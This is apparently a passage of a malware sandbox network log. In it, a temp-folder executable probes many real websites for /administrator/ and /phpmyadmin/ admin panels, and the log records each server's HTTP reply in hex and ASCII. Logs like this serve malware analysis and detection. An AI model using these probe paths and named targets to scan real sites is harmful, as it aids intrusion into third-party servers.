                                                                                                                                                                                                                                                                                                                                Data Raw: 66 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: fb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kompresory-servis.sk/phpMyAdmin/">here</a>.</p></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                111192.168.2.45504550.116.86.49805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.794298887 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.086148024 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                112192.168.2.45508250.116.86.49805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.838680983 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.103435993 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                113192.168.2.45518335.190.10.69805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.890687943 CET181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.069957972 CET382INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                Location: https://ericrothphoto.com/administrator/
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.350229025 CET190OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.528814077 CET209INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:03 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                Location: https://ericrothphoto.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.528851986 CET182INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                114192.168.2.455140216.230.253.85805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.907130003 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-art-studio.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.107656002 CET333INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                WWW-Authenticate: Basic realm="Access Control Service"
                                                                                                                                                                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 27 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 39 39 33 33 33 33 3b 27 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head></head><body><h1 style='text-align: center;'><span style='color: #993333;'>401 Unauthorized</span></h1></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                115192.168.2.455038185.32.160.10805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.907331944 CET182OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: detmar.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.163444996 CET541INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Phusion_Passenger/6.0.14
                                                                                                                                                                                                                                                                                                                                Location: http://www.detmar.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                Content-Length: 252
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 74 6d 61 72 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.detmar.sk/administrator/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                116192.168.2.455066185.32.160.10805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.922602892 CET182OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: detmar.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.173708916 CET541INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Phusion_Passenger/6.0.14
                                                                                                                                                                                                                                                                                                                                Location: http://www.detmar.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                Content-Length: 252
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 74 6d 61 72 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.detmar.sk/administrator/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                117192.168.2.45511692.240.253.3805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.954154015 CET173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.209287882 CET433INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                location: https://eurokamen.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                content-length: 240
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eurokamen.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                118192.168.2.45513962.109.151.15805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.957636118 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-bicycles.eu
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.208137989 CET456INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://e-bicycles.eu/administrator/index.php
                                                                                                                                                                                                                                                                                                                                X-VHost-Debug: b069264ca25c6b1ae18fe55ad31be2d72fbd3cdd0570fe0ff2201b05ef636851
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                119192.168.2.45513762.109.151.15805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.962620974 CET186OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-bicycles.eu
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.217540026 CET456INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://e-bicycles.eu/administrator/index.php
                                                                                                                                                                                                                                                                                                                                X-VHost-Debug: b069264ca25c6b1ae18fe55ad31be2d72fbd3cdd0570fe0ff2201b05ef636851
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                120192.168.2.455136162.43.104.145805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.011989117 CET184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.396095037 CET343INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Location: https://nakacho.com/administrator/index.php


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                121192.168.2.45513823.236.62.147805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.046515942 CET188OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kingsway-hk.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.294384003 CET536INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                location: https://www.kingsway-hk.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=3600
                                                                                                                                                                                                                                                                                                                                Age: 3738
                                                                                                                                                                                                                                                                                                                                Server-Timing: cache;desc=hit, varnish;desc=hit, dc;desc=uw2-pub-1
                                                                                                                                                                                                                                                                                                                                X-Seen-By: dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLsF6ZK0ExZ9qybsUJ5Iw3hMm++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalo9uFF28YkEC/7bChJmM0s+7ko77xagNBRQJWcSqR1hXAYV+Yr47xaEWcAMAHQLKgA==,2UNV7KOq4oGjA5+PKsX47Hi7lH2vae
                                                                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.294395924 CET143INData Raw: 68 43 31 74 78 30 33 4c 54 50 53 64 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 33
                                                                                                                                                                                                                                                                                                                                Data Ascii: hC1tx03LTPSdjPZTuGyYqVhtmEIgJUb4wCache-Control: no-cacheX-Wix-Request-Id: 1703131410.15878783386419751X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                122192.168.2.45546450.116.86.49805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.236761093 CET246OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: escolapatelli.com.br
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
